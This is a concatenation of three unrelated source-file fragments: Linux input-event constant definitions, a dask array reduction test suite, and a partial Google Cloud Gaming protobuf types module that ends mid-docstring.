KEY_BRIGHTNESS_ZERO = 244 # brightness off, use ambient
KEY_DISPLAY_OFF = 245 # display device to off state
KEY_WIMAX = 246
BTN_MISC = 0x100
BTN_0 = 0x100
BTN_1 = 0x101
BTN_2 = 0x102
BTN_3 = 0x103
BTN_4 = 0x104
BTN_5 = 0x105
BTN_6 = 0x106
BTN_7 = 0x107
BTN_8 = 0x108
BTN_9 = 0x109
BTN_MOUSE = 0x110
BTN_LEFT = 0x110
BTN_RIGHT = 0x111
BTN_MIDDLE = 0x112
BTN_SIDE = 0x113
BTN_EXTRA = 0x114
BTN_FORWARD = 0x115
BTN_BACK = 0x116
BTN_TASK = 0x117
BTN_JOYSTICK = 0x120
BTN_TRIGGER = 0x120
BTN_THUMB = 0x121
BTN_THUMB2 = 0x122
BTN_TOP = 0x123
BTN_TOP2 = 0x124
BTN_PINKIE = 0x125
BTN_BASE = 0x126
BTN_BASE2 = 0x127
BTN_BASE3 = 0x128
BTN_BASE4 = 0x129
BTN_BASE5 = 0x12a
BTN_BASE6 = 0x12b
BTN_DEAD = 0x12f
BTN_GAMEPAD = 0x130
BTN_A = 0x130
BTN_B = 0x131
BTN_C = 0x132
BTN_X = 0x133
BTN_Y = 0x134
BTN_Z = 0x135
BTN_TL = 0x136
BTN_TR = 0x137
BTN_TL2 = 0x138
BTN_TR2 = 0x139
BTN_SELECT = 0x13a
BTN_START = 0x13b
BTN_MODE = 0x13c
BTN_THUMBL = 0x13d
BTN_THUMBR = 0x13e
BTN_DIGI = 0x140
BTN_TOOL_PEN = 0x140
BTN_TOOL_RUBBER = 0x141
BTN_TOOL_BRUSH = 0x142
BTN_TOOL_PENCIL = 0x143
BTN_TOOL_AIRBRUSH = 0x144
BTN_TOOL_FINGER = 0x145
BTN_TOOL_MOUSE = 0x146
BTN_TOOL_LENS = 0x147
BTN_TOUCH = 0x14a
BTN_STYLUS = 0x14b
BTN_STYLUS2 = 0x14c
BTN_TOOL_DOUBLETAP = 0x14d
BTN_TOOL_TRIPLETAP = 0x14e
BTN_TOOL_QUADTAP = 0x14f # Four fingers on trackpad
BTN_WHEEL = 0x150
BTN_GEAR_DOWN = 0x150
BTN_GEAR_UP = 0x151
KEY_OK = 0x160
KEY_SELECT = 0x161
KEY_GOTO = 0x162
KEY_CLEAR = 0x163
KEY_POWER2 = 0x164
KEY_OPTION = 0x165
KEY_INFO = 0x166 # AL OEM Features/Tips/Tutorial
KEY_TIME = 0x167
KEY_VENDOR = 0x168
KEY_ARCHIVE = 0x169
KEY_PROGRAM = 0x16a # Media Select Program Guide
KEY_CHANNEL = 0x16b
KEY_FAVORITES = 0x16c
KEY_EPG = 0x16d
KEY_PVR = 0x16e # Media Select Home
KEY_MHP = 0x16f
KEY_LANGUAGE = 0x170
KEY_TITLE = 0x171
KEY_SUBTITLE = 0x172
KEY_ANGLE = 0x173
KEY_ZOOM = 0x174
KEY_MODE = 0x175
KEY_KEYBOARD = 0x176
KEY_SCREEN = 0x177
KEY_PC = 0x178 # Media Select Computer
KEY_TV = 0x179 # Media Select TV
KEY_TV2 = 0x17a # Media Select Cable
KEY_VCR = 0x17b # Media Select VCR
KEY_VCR2 = 0x17c # VCR Plus
KEY_SAT = 0x17d # Media Select Satellite
KEY_SAT2 = 0x17e
KEY_CD = 0x17f # Media Select CD
KEY_TAPE = 0x180 # Media Select Tape
KEY_RADIO = 0x181
KEY_TUNER = 0x182 # Media Select Tuner
KEY_PLAYER = 0x183
KEY_TEXT = 0x184
KEY_DVD = 0x185 # Media Select DVD
KEY_AUX = 0x186
KEY_MP3 = 0x187
KEY_AUDIO = 0x188
KEY_VIDEO = 0x189
KEY_DIRECTORY = 0x18a
KEY_LIST = 0x18b
KEY_MEMO = 0x18c # Media Select Messages
KEY_CALENDAR = 0x18d
KEY_RED = 0x18e
KEY_GREEN = 0x18f
KEY_YELLOW = 0x190
KEY_BLUE = 0x191
KEY_CHANNELUP = 0x192 # Channel Increment
KEY_CHANNELDOWN = 0x193 # Channel Decrement
KEY_FIRST = 0x194
KEY_LAST = 0x195 # Recall Last
KEY_AB = 0x196
KEY_NEXT = 0x197
KEY_RESTART = 0x198
KEY_SLOW = 0x199
KEY_SHUFFLE = 0x19a
KEY_BREAK = 0x19b
KEY_PREVIOUS = 0x19c
KEY_DIGITS = 0x19d
KEY_TEEN = 0x19e
KEY_TWEN = 0x19f
KEY_VIDEOPHONE = 0x1a0 # Media Select Video Phone
KEY_GAMES = 0x1a1 # Media Select Games
KEY_ZOOMIN = 0x1a2 # AC Zoom In
KEY_ZOOMOUT = 0x1a3 # AC Zoom Out
KEY_ZOOMRESET = 0x1a4 # AC Zoom
KEY_WORDPROCESSOR = 0x1a5 # AL Word Processor
KEY_EDITOR = 0x1a6 # AL Text Editor
KEY_SPREADSHEET = 0x1a7 # AL Spreadsheet
KEY_GRAPHICSEDITOR = 0x1a8 # AL Graphics Editor
KEY_PRESENTATION = 0x1a9 # AL Presentation App
KEY_DATABASE = 0x1aa # AL Database App
KEY_NEWS = 0x1ab # AL Newsreader
KEY_VOICEMAIL = 0x1ac # AL Voicemail
KEY_ADDRESSBOOK = 0x1ad # AL Contacts/Address Book
KEY_MESSENGER = 0x1ae # AL Instant Messaging
KEY_DISPLAYTOGGLE = 0x1af # Turn display (LCD) on and off
KEY_SPELLCHECK = 0x1b0 # AL Spell Check
KEY_LOGOFF = 0x1b1 # AL Logoff
KEY_DOLLAR = 0x1b2
KEY_EURO = 0x1b3
KEY_FRAMEBACK = 0x1b4 # Consumer - transport controls
KEY_FRAMEFORWARD = 0x1b5
KEY_CONTEXT_MENU = 0x1b6 # GenDesc - system context menu
KEY_MEDIA_REPEAT = 0x1b7 # Consumer - transport control
KEY_DEL_EOL = 0x1c0
KEY_DEL_EOS = 0x1c1
KEY_INS_LINE = 0x1c2
KEY_DEL_LINE = 0x1c3
KEY_FN = 0x1d0
KEY_FN_ESC = 0x1d1
KEY_FN_F1 = 0x1d2
KEY_FN_F2 = 0x1d3
KEY_FN_F3 = 0x1d4
KEY_FN_F4 = 0x1d5
KEY_FN_F5 = 0x1d6
KEY_FN_F6 = 0x1d7
KEY_FN_F7 = 0x1d8
KEY_FN_F8 = 0x1d9
KEY_FN_F9 = 0x1da
KEY_FN_F10 = 0x1db
KEY_FN_F11 = 0x1dc
KEY_FN_F12 = 0x1dd
KEY_FN_1 = 0x1de
KEY_FN_2 = 0x1df
KEY_FN_D = 0x1e0
KEY_FN_E = 0x1e1
KEY_FN_F = 0x1e2
KEY_FN_S = 0x1e3
KEY_FN_B = 0x1e4
KEY_BRL_DOT1 = 0x1f1
KEY_BRL_DOT2 = 0x1f2
KEY_BRL_DOT3 = 0x1f3
KEY_BRL_DOT4 = 0x1f4
KEY_BRL_DOT5 = 0x1f5
KEY_BRL_DOT6 = 0x1f6
KEY_BRL_DOT7 = 0x1f7
KEY_BRL_DOT8 = 0x1f8
KEY_BRL_DOT9 = 0x1f9
KEY_BRL_DOT10 = 0x1fa
KEY_NUMERIC_0 = 0x200 # used by phones, remote controls,
KEY_NUMERIC_1 = 0x201 # and other keypads
KEY_NUMERIC_2 = 0x202
KEY_NUMERIC_3 = 0x203
KEY_NUMERIC_4 = 0x204
KEY_NUMERIC_5 = 0x205
KEY_NUMERIC_6 = 0x206
KEY_NUMERIC_7 = 0x207
KEY_NUMERIC_8 = 0x208
KEY_NUMERIC_9 = 0x209
KEY_NUMERIC_STAR = 0x20a
KEY_NUMERIC_POUND = 0x20b
KEY_MIN_INTERESTING = KEY_MUTE
KEY_MAX = 0x2ff
KEY_CNT = (KEY_MAX+1)
REL_X = 0x00
REL_Y = 0x01
REL_Z = 0x02
REL_RX = 0x03
REL_RY = 0x04
REL_RZ = 0x05
REL_HWHEEL = 0x06
REL_DIAL = 0x07
REL_WHEEL = 0x08
REL_MISC = 0x09
REL_MAX = 0x0f
REL_CNT = (REL_MAX+1)
ABS_X = 0x00
ABS_Y = 0x01
ABS_Z = 0x02
ABS_RX = 0x03
ABS_RY = 0x04
ABS_RZ = 0x05
ABS_THROTTLE = 0x06
ABS_RUDDER = 0x07
ABS_WHEEL = 0x08
ABS_GAS = 0x09
ABS_BRAKE = 0x0a
ABS_HAT0X = 0x10
ABS_HAT0Y = 0x11
ABS_HAT1X = 0x12
ABS_HAT1Y = 0x13
ABS_HAT2X = 0x14
ABS_HAT2Y = 0x15
ABS_HAT3X = 0x16
ABS_HAT3Y = 0x17
ABS_PRESSURE = 0x18
ABS_DISTANCE = 0x19
ABS_TILT_X = 0x1a
ABS_TILT_Y = 0x1b
ABS_TOOL_WIDTH = 0x1c
ABS_VOLUME = 0x20
ABS_MISC = 0x28
ABS_MT_TOUCH_MAJOR = 0x30 # Major axis of touching ellipse
ABS_MT_TOUCH_MINOR = 0x31 # Minor axis (omit if circular)
ABS_MT_WIDTH_MAJOR = 0x32 # Major axis of approaching ellipse
ABS_MT_WIDTH_MINOR = 0x33 # Minor axis (omit if circular)
ABS_MT_ORIENTATION = 0x34 # Ellipse orientation
ABS_MT_POSITION_X = 0x35 # Center X ellipse position
ABS_MT_POSITION_Y = 0x36 # Center Y ellipse position
ABS_MT_TOOL_TYPE = 0x37 # Type of touching device
ABS_MT_BLOB_ID = 0x38 # Group a set of packets as a blob
ABS_MT_TRACKING_ID = 0x39 # Unique ID of initiated contact
ABS_MAX = 0x3f
ABS_CNT = (ABS_MAX+1)
SW_LID = 0x00 # set = lid shut
SW_TABLET_MODE = 0x01 # set = tablet mode
SW_HEADPHONE_INSERT = 0x02 # set = inserted
SW_RFKILL_ALL = 0x03 # rfkill master switch, type "any"
SW_RADIO = SW_RFKILL_ALL # deprecated
SW_MICROPHONE_INSERT = 0x04 # set = inserted
SW_DOCK = 0x05 # set = plugged into dock
SW_LINEOUT_INSERT = 0x06 # set = inserted
SW_JACK_PHYSICAL_INSERT = 0x07 # set = mechanical switch set
SW_VIDEOOUT_INSERT = 0x08 # set = inserted
SW_MAX = 0x0f
SW_CNT = (SW_MAX+1)
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
MSC_CNT = (MSC_MAX+1)
LED_NUML = 0x00
LED_CAPSL = 0x01
LED_SCROLLL = 0x02
LED_COMPOSE = 0x03
LED_KANA = 0x04
LED_SLEEP = 0x05
LED_SUSPEND = 0x06
LED_MUTE = 0x07
LED_MISC = 0x08
LED_MAIL = 0x09
LED_CHARGING = 0x0a
LED_MAX = 0x0f
LED_CNT = (LED_MAX+1)
REP_DELAY = 0x00
REP_PERIOD = 0x01
REP_MAX = 0x01
SND_CLICK = 0x00
SND_BELL = 0x01
SND_TONE = 0x02
SND_MAX = 0x07
SND_CNT = (SND_MAX+1)
ID_BUS = 0
ID_VENDOR = 1
ID_PRODUCT = 2
ID_VERSION = 3
BUS_PCI = 0x01
BUS_ISAPNP = 0x02
BUS_USB = 0x03
BUS_HIL = 0x04
BUS_BLUETOOTH = 0x05
BUS_VIRTUAL = 0x06
BUS_ISA = 0x10
BUS_I8042 = 0x11
BUS_XTKBD = 0x12
BUS_RS232 = 0x13
BUS_GAMEPORT = 0x14
BUS_PARPORT = 0x15
BUS_AMIGA = 0x16
BUS_ADB = 0x17
BUS_I2C = 0x18
BUS_HOST = 0x19
BUS_GSC = 0x1A
BUS_ATARI = 0x1B
MT_TOOL_FINGER = 0
MT_TOOL_PEN = 1
FF_STATUS_STOPPED = 0x00
FF_STATUS_PLAYING = 0x01
FF_STATUS_MAX = 0x01
FF_RUMBLE = 0x50
FF_PERIODIC = 0x51
FF_CONSTANT = 0x52
FF_SPRING = 0x53
FF_FRICTION = 0x54
FF_DAMPER = 0x55
FF_INERTIA = 0x56
FF_RAMP = 0x57
FF_EFFECT_MIN = FF_RUMBLE
FF_EFFECT_MAX = FF_RAMP
FF_SQUARE = 0x58
FF_TRIANGLE = 0x59
FF_SINE = 0x5a
FF_SAW_UP = 0x5b
FF_SAW_DOWN = 0x5c
FF_CUSTOM = 0x5d
FF_WAVEFORM_MIN = FF_SQUARE
FF_WAVEFORM_MAX = FF_CUSTOM
FF_GAIN = 0x60
FF_AUTOCENTER = 0x61
FF_MAX = 0x7f
FF_CNT = (FF_MAX+1)
#__reverse = dict(map(lambda x: (x[1],x[0]), globals().items()))
| |
from __future__ import absolute_import, division, print_function
import pytest
pytest.importorskip('numpy')
import dask.array as da
from dask.array.utils import assert_eq as _assert_eq
from dask.core import get_deps
from dask.context import set_options
import numpy as np
# temporary until numpy functions migrated
try:
from numpy import nanprod
except ImportError: # pragma: no cover
import dask.array.numpy_compat as npcompat
nanprod = npcompat.nanprod
def assert_eq(a, b):
_assert_eq(a, b, equal_nan=True)
def same_keys(a, b):
def key(k):
if isinstance(k, str):
return (k, -1, -1, -1)
else:
return k
return sorted(a.dask, key=key) == sorted(b.dask, key=key)
def reduction_1d_test(da_func, darr, np_func, narr, use_dtype=True, split_every=True):
assert_eq(da_func(darr), np_func(narr))
assert_eq(da_func(darr, keepdims=True), np_func(narr, keepdims=True))
assert same_keys(da_func(darr), da_func(darr))
assert same_keys(da_func(darr, keepdims=True), da_func(darr, keepdims=True))
if use_dtype:
assert_eq(da_func(darr, dtype='f8'), np_func(narr, dtype='f8'))
assert_eq(da_func(darr, dtype='i8'), np_func(narr, dtype='i8'))
assert same_keys(da_func(darr, dtype='i8'), da_func(darr, dtype='i8'))
if split_every:
a1 = da_func(darr, split_every=2)
a2 = da_func(darr, split_every={0: 2})
assert same_keys(a1, a2)
assert_eq(a1, np_func(narr))
assert_eq(a2, np_func(narr))
assert_eq(da_func(darr, keepdims=True, split_every=2),
np_func(narr, keepdims=True))
@pytest.mark.parametrize('dtype', ['f4', 'i4'])
def test_reductions_1D(dtype):
x = np.arange(5).astype(dtype)
a = da.from_array(x, chunks=(2,))
reduction_1d_test(da.sum, a, np.sum, x)
reduction_1d_test(da.prod, a, np.prod, x)
reduction_1d_test(da.mean, a, np.mean, x)
reduction_1d_test(da.var, a, np.var, x)
reduction_1d_test(da.std, a, np.std, x)
reduction_1d_test(da.min, a, np.min, x, False)
reduction_1d_test(da.max, a, np.max, x, False)
reduction_1d_test(da.any, a, np.any, x, False)
reduction_1d_test(da.all, a, np.all, x, False)
reduction_1d_test(da.nansum, a, np.nansum, x)
reduction_1d_test(da.nanprod, a, nanprod, x)
reduction_1d_test(da.nanmean, a, np.mean, x)
reduction_1d_test(da.nanvar, a, np.var, x)
reduction_1d_test(da.nanstd, a, np.std, x)
reduction_1d_test(da.nanmin, a, np.nanmin, x, False)
reduction_1d_test(da.nanmax, a, np.nanmax, x, False)
def reduction_2d_test(da_func, darr, np_func, narr, use_dtype=True,
split_every=True):
assert_eq(da_func(darr), np_func(narr))
assert_eq(da_func(darr, keepdims=True), np_func(narr, keepdims=True))
assert_eq(da_func(darr, axis=0), np_func(narr, axis=0))
assert_eq(da_func(darr, axis=1), np_func(narr, axis=1))
assert_eq(da_func(darr, axis=1, keepdims=True),
np_func(narr, axis=1, keepdims=True))
assert_eq(da_func(darr, axis=(1, 0)), np_func(narr, axis=(1, 0)))
assert same_keys(da_func(darr, axis=1), da_func(darr, axis=1))
assert same_keys(da_func(darr, axis=(1, 0)), da_func(darr, axis=(1, 0)))
if use_dtype:
assert_eq(da_func(darr, dtype='f8'), np_func(narr, dtype='f8'))
assert_eq(da_func(darr, dtype='i8'), np_func(narr, dtype='i8'))
if split_every:
a1 = da_func(darr, split_every=4)
a2 = da_func(darr, split_every={0: 2, 1: 2})
assert same_keys(a1, a2)
assert_eq(a1, np_func(narr))
assert_eq(a2, np_func(narr))
assert_eq(da_func(darr, keepdims=True, split_every=4),
np_func(narr, keepdims=True))
assert_eq(da_func(darr, axis=0, split_every=2), np_func(narr, axis=0))
assert_eq(da_func(darr, axis=0, keepdims=True, split_every=2),
np_func(narr, axis=0, keepdims=True))
assert_eq(da_func(darr, axis=1, split_every=2), np_func(narr, axis=1))
assert_eq(da_func(darr, axis=1, keepdims=True, split_every=2),
np_func(narr, axis=1, keepdims=True))
@pytest.mark.parametrize('dtype', ['f4', 'i4'])
def test_reductions_2D(dtype):
x = np.arange(1, 122).reshape((11, 11)).astype(dtype)
a = da.from_array(x, chunks=(4, 4))
b = a.sum(keepdims=True)
assert b._keys() == [[(b.name, 0, 0)]]
reduction_2d_test(da.sum, a, np.sum, x)
reduction_2d_test(da.prod, a, np.prod, x)
reduction_2d_test(da.mean, a, np.mean, x)
reduction_2d_test(da.var, a, np.var, x, False) # Difference in dtype algo
reduction_2d_test(da.std, a, np.std, x, False) # Difference in dtype algo
reduction_2d_test(da.min, a, np.min, x, False)
reduction_2d_test(da.max, a, np.max, x, False)
reduction_2d_test(da.any, a, np.any, x, False)
reduction_2d_test(da.all, a, np.all, x, False)
reduction_2d_test(da.nansum, a, np.nansum, x)
reduction_2d_test(da.nanprod, a, nanprod, x)
reduction_2d_test(da.nanmean, a, np.mean, x)
reduction_2d_test(da.nanvar, a, np.nanvar, x, False) # Difference in dtype algo
reduction_2d_test(da.nanstd, a, np.nanstd, x, False) # Difference in dtype algo
reduction_2d_test(da.nanmin, a, np.nanmin, x, False)
reduction_2d_test(da.nanmax, a, np.nanmax, x, False)
@pytest.mark.parametrize(['dfunc', 'func'],
[(da.argmin, np.argmin), (da.argmax, np.argmax),
(da.nanargmin, np.nanargmin),
(da.nanargmax, np.nanargmax)])
def test_arg_reductions(dfunc, func):
x = np.random.random((10, 10, 10))
a = da.from_array(x, chunks=(3, 4, 5))
assert_eq(dfunc(a), func(x))
assert_eq(dfunc(a, 0), func(x, 0))
assert_eq(dfunc(a, 1), func(x, 1))
assert_eq(dfunc(a, 2), func(x, 2))
with set_options(split_every=2):
assert_eq(dfunc(a), func(x))
assert_eq(dfunc(a, 0), func(x, 0))
assert_eq(dfunc(a, 1), func(x, 1))
assert_eq(dfunc(a, 2), func(x, 2))
pytest.raises(ValueError, lambda: dfunc(a, 3))
pytest.raises(TypeError, lambda: dfunc(a, (0, 1)))
x2 = np.arange(10)
a2 = da.from_array(x2, chunks=3)
assert_eq(dfunc(a2), func(x2))
assert_eq(dfunc(a2, 0), func(x2, 0))
assert_eq(dfunc(a2, 0, split_every=2), func(x2, 0))
@pytest.mark.parametrize(['dfunc', 'func'],
[(da.nanargmin, np.nanargmin),
(da.nanargmax, np.nanargmax)])
def test_nanarg_reductions(dfunc, func):
x = np.random.random((10, 10, 10))
x[5] = np.nan
a = da.from_array(x, chunks=(3, 4, 5))
assert_eq(dfunc(a), func(x))
assert_eq(dfunc(a, 0), func(x, 0))
with pytest.raises(ValueError):
dfunc(a, 1).compute()
with pytest.raises(ValueError):
dfunc(a, 2).compute()
x[:] = np.nan
a = da.from_array(x, chunks=(3, 4, 5))
with pytest.raises(ValueError):
dfunc(a).compute()
def test_reductions_2D_nans():
# chunks are a mix of some/all/no NaNs
x = np.full((4, 4), np.nan)
x[:2, :2] = np.array([[1, 2], [3, 4]])
x[2, 2] = 5
x[3, 3] = 6
a = da.from_array(x, chunks=(2, 2))
reduction_2d_test(da.sum, a, np.sum, x, False, False)
reduction_2d_test(da.prod, a, np.prod, x, False, False)
reduction_2d_test(da.mean, a, np.mean, x, False, False)
reduction_2d_test(da.var, a, np.var, x, False, False)
reduction_2d_test(da.std, a, np.std, x, False, False)
reduction_2d_test(da.min, a, np.min, x, False, False)
reduction_2d_test(da.max, a, np.max, x, False, False)
reduction_2d_test(da.any, a, np.any, x, False, False)
reduction_2d_test(da.all, a, np.all, x, False, False)
reduction_2d_test(da.nansum, a, np.nansum, x, False, False)
reduction_2d_test(da.nanprod, a, nanprod, x, False, False)
reduction_2d_test(da.nanmean, a, np.nanmean, x, False, False)
reduction_2d_test(da.nanvar, a, np.nanvar, x, False, False)
reduction_2d_test(da.nanstd, a, np.nanstd, x, False, False)
reduction_2d_test(da.nanmin, a, np.nanmin, x, False, False)
reduction_2d_test(da.nanmax, a, np.nanmax, x, False, False)
assert_eq(da.argmax(a), np.argmax(x))
assert_eq(da.argmin(a), np.argmin(x))
assert_eq(da.nanargmax(a), np.nanargmax(x))
assert_eq(da.nanargmin(a), np.nanargmin(x))
assert_eq(da.argmax(a, axis=0), np.argmax(x, axis=0))
assert_eq(da.argmin(a, axis=0), np.argmin(x, axis=0))
assert_eq(da.nanargmax(a, axis=0), np.nanargmax(x, axis=0))
assert_eq(da.nanargmin(a, axis=0), np.nanargmin(x, axis=0))
assert_eq(da.argmax(a, axis=1), np.argmax(x, axis=1))
assert_eq(da.argmin(a, axis=1), np.argmin(x, axis=1))
assert_eq(da.nanargmax(a, axis=1), np.nanargmax(x, axis=1))
assert_eq(da.nanargmin(a, axis=1), np.nanargmin(x, axis=1))
def test_moment():
def moment(x, n, axis=None):
return (((x - x.mean(axis=axis, keepdims=True)) ** n).sum(axis=axis) /
np.ones_like(x).sum(axis=axis))
# Poorly conditioned
x = np.array([1., 2., 3.] * 10).reshape((3, 10)) + 1e8
a = da.from_array(x, chunks=5)
assert_eq(a.moment(2), moment(x, 2))
assert_eq(a.moment(3), moment(x, 3))
assert_eq(a.moment(4), moment(x, 4))
x = np.arange(1, 122).reshape((11, 11)).astype('f8')
a = da.from_array(x, chunks=(4, 4))
assert_eq(a.moment(4, axis=1), moment(x, 4, axis=1))
assert_eq(a.moment(4, axis=(1, 0)), moment(x, 4, axis=(1, 0)))
# Tree reduction
assert_eq(a.moment(order=4, split_every=4), moment(x, 4))
assert_eq(a.moment(order=4, axis=0, split_every=4), moment(x, 4, axis=0))
assert_eq(a.moment(order=4, axis=1, split_every=4), moment(x, 4, axis=1))
def test_reductions_with_negative_axes():
x = np.random.random((4, 4, 4))
a = da.from_array(x, chunks=2)
assert_eq(a.argmin(axis=-1), x.argmin(axis=-1))
assert_eq(a.argmin(axis=-1, split_every=2), x.argmin(axis=-1))
assert_eq(a.sum(axis=-1), x.sum(axis=-1))
assert_eq(a.sum(axis=(0, -1)), x.sum(axis=(0, -1)))
def test_nan():
x = np.array([[1, np.nan, 3, 4],
[5, 6, 7, np.nan],
[9, 10, 11, 12]])
d = da.from_array(x, chunks=(2, 2))
assert_eq(np.nansum(x), da.nansum(d))
assert_eq(np.nansum(x, axis=0), da.nansum(d, axis=0))
assert_eq(np.nanmean(x, axis=1), da.nanmean(d, axis=1))
assert_eq(np.nanmin(x, axis=1), da.nanmin(d, axis=1))
assert_eq(np.nanmax(x, axis=(0, 1)), da.nanmax(d, axis=(0, 1)))
assert_eq(np.nanvar(x), da.nanvar(d))
assert_eq(np.nanstd(x, axis=0), da.nanstd(d, axis=0))
assert_eq(np.nanargmin(x, axis=0), da.nanargmin(d, axis=0))
assert_eq(np.nanargmax(x, axis=0), da.nanargmax(d, axis=0))
assert_eq(nanprod(x), da.nanprod(d))
def test_0d_array():
x = da.mean(da.ones(4, chunks=4), axis=0).compute()
y = np.mean(np.ones(4))
assert type(x) == type(y)
x = da.sum(da.zeros(4, chunks=1)).compute()
y = np.sum(np.zeros(4))
assert type(x) == type(y)
def test_reduction_on_scalar():
x = da.from_array(np.array(1.0), chunks=())
assert (x == x).all()
def assert_max_deps(x, n, eq=True):
dependencies, dependents = get_deps(x.dask)
if eq:
assert max(map(len, dependencies.values())) == n
else:
assert max(map(len, dependencies.values())) <= n
def test_tree_reduce_depth():
# 2D
x = da.from_array(np.arange(242).reshape((11, 22)), chunks=(3, 4))
thresh = {0: 2, 1: 3}
assert_max_deps(x.sum(split_every=thresh), 2 * 3)
assert_max_deps(x.sum(axis=0, split_every=thresh), 2)
assert_max_deps(x.sum(axis=1, split_every=thresh), 3)
assert_max_deps(x.sum(split_every=20), 20, False)
assert_max_deps(x.sum(axis=0, split_every=20), 4)
assert_max_deps(x.sum(axis=1, split_every=20), 6)
# 3D
x = da.from_array(np.arange(11 * 22 * 29).reshape((11, 22, 29)), chunks=(3, 4, 5))
thresh = {0: 2, 1: 3, 2: 4}
assert_max_deps(x.sum(split_every=thresh), 2 * 3 * 4)
assert_max_deps(x.sum(axis=0, split_every=thresh), 2)
assert_max_deps(x.sum(axis=1, split_every=thresh), 3)
assert_max_deps(x.sum(axis=2, split_every=thresh), 4)
assert_max_deps(x.sum(axis=(0, 1), split_every=thresh), 2 * 3)
assert_max_deps(x.sum(axis=(0, 2), split_every=thresh), 2 * 4)
assert_max_deps(x.sum(axis=(1, 2), split_every=thresh), 3 * 4)
assert_max_deps(x.sum(split_every=20), 20, False)
assert_max_deps(x.sum(axis=0, split_every=20), 4)
assert_max_deps(x.sum(axis=1, split_every=20), 6)
assert_max_deps(x.sum(axis=2, split_every=20), 6)
assert_max_deps(x.sum(axis=(0, 1), split_every=20), 20, False)
assert_max_deps(x.sum(axis=(0, 2), split_every=20), 20, False)
assert_max_deps(x.sum(axis=(1, 2), split_every=20), 20, False)
assert_max_deps(x.sum(axis=(0, 1), split_every=40), 4 * 6)
assert_max_deps(x.sum(axis=(0, 2), split_every=40), 4 * 6)
assert_max_deps(x.sum(axis=(1, 2), split_every=40), 6 * 6)
def test_tree_reduce_set_options():
x = da.from_array(np.arange(242).reshape((11, 22)), chunks=(3, 4))
with set_options(split_every={0: 2, 1: 3}):
assert_max_deps(x.sum(), 2 * 3)
assert_max_deps(x.sum(axis=0), 2)
def test_reduction_names():
x = da.ones(5, chunks=(2,))
assert x.sum().name.startswith('sum')
assert 'max' in x.max().name.split('-')[0]
assert x.var().name.startswith('var')
assert x.all().name.startswith('all')
assert any(k[0].startswith('nansum') for k in da.nansum(x).dask)
assert x.mean().name.startswith('mean')
| |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.gaming_v1.types import common
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.gaming.v1",
manifest={
"ListRealmsRequest",
"ListRealmsResponse",
"GetRealmRequest",
"CreateRealmRequest",
"DeleteRealmRequest",
"UpdateRealmRequest",
"PreviewRealmUpdateRequest",
"PreviewRealmUpdateResponse",
"Realm",
},
)
class ListRealmsRequest(proto.Message):
r"""Request message for RealmsService.ListRealms.
Attributes:
parent (str):
Required. The parent resource name, in the following form:
``projects/{project}/locations/{location}``.
page_size (int):
Optional. The maximum number of items to return. If
unspecified, server will pick an appropriate default. Server
may return fewer items than requested. A caller should only
rely on response's
[next_page_token][google.cloud.gaming.v1.ListRealmsResponse.next_page_token]
to determine if there are more realms left to be queried.
page_token (str):
Optional. The next_page_token value returned from a previous
List request, if any.
filter (str):
Optional. The filter to apply to list
results.
order_by (str):
Optional. Specifies the ordering of results following syntax
at
https://cloud.google.com/apis/design/design_patterns#sorting_order.
"""
parent = proto.Field(proto.STRING, number=1,)
page_size = proto.Field(proto.INT32, number=2,)
page_token = proto.Field(proto.STRING, number=3,)
filter = proto.Field(proto.STRING, number=4,)
order_by = proto.Field(proto.STRING, number=5,)
class ListRealmsResponse(proto.Message):
r"""Response message for RealmsService.ListRealms.
Attributes:
realms (Sequence[google.cloud.gaming_v1.types.Realm]):
The list of realms.
next_page_token (str):
Token to retrieve the next page of results,
or empty if there are no more results in the
list.
unreachable (Sequence[str]):
List of locations that could not be reached.
"""
@property
def raw_page(self):
return self
realms = proto.RepeatedField(proto.MESSAGE, number=1, message="Realm",)
next_page_token = proto.Field(proto.STRING, number=2,)
unreachable = proto.RepeatedField(proto.STRING, number=3,)
class GetRealmRequest(proto.Message):
r"""Request message for RealmsService.GetRealm.
Attributes:
name (str):
Required. The name of the realm to retrieve, in the
following form:
``projects/{project}/locations/{location}/realms/{realm}``.
"""
name = proto.Field(proto.STRING, number=1,)
class CreateRealmRequest(proto.Message):
r"""Request message for RealmsService.CreateRealm.
Attributes:
parent (str):
Required. The parent resource name, in the following form:
``projects/{project}/locations/{location}``.
realm_id (str):
Required. The ID of the realm resource to be
created.
realm (google.cloud.gaming_v1.types.Realm):
Required. The realm resource to be created.
"""
parent = proto.Field(proto.STRING, number=1,)
realm_id = proto.Field(proto.STRING, number=2,)
realm = proto.Field(proto.MESSAGE, number=3, message="Realm",)
class DeleteRealmRequest(proto.Message):
r"""Request message for RealmsService.DeleteRealm.
Attributes:
name (str):
Required. The name of the realm to delete, in the following
form:
``projects/{project}/locations/{location}/realms/{realm}``.
"""
name = proto.Field(proto.STRING, number=1,)
class UpdateRealmRequest(proto.Message):
r"""Request message for RealmsService.UpdateRealm.
Attributes:
realm (google.cloud.gaming_v1.types.Realm):
Required. The realm to be updated. Only fields specified in
update_mask are updated.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For the
``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask
"""
realm = proto.Field(proto.MESSAGE, number=1, message="Realm",)
update_mask = proto.Field(
proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,
)
class PreviewRealmUpdateRequest(proto.Message):
r"""Request message for RealmsService.PreviewRealmUpdate.
Attributes:
realm (google.cloud.gaming_v1.types.Realm):
Required. The realm to be updated. Only fields specified in
update_mask are updated.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For the
``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask
preview_time (google.protobuf.timestamp_pb2.Timestamp):
